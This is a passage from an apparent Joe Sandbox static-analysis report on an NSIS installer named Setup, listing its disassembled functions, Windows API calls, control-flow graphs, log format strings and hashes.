                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,CanPoland,CanPoland,00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                        • String ID: CanPoland$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                        • API String ID: 4286501637-3376295515
                                                                                                                                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                        Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                        Strings
                                                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                        • String ID: (]C$... %d%%$pAB$yAB
                                                                                                                                                                        • API String ID: 651206458-2023174797
                                                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                        Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                        • String ID: <RM>$CanPoland$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                        • API String ID: 247603264-2569684089
                                                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                        Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
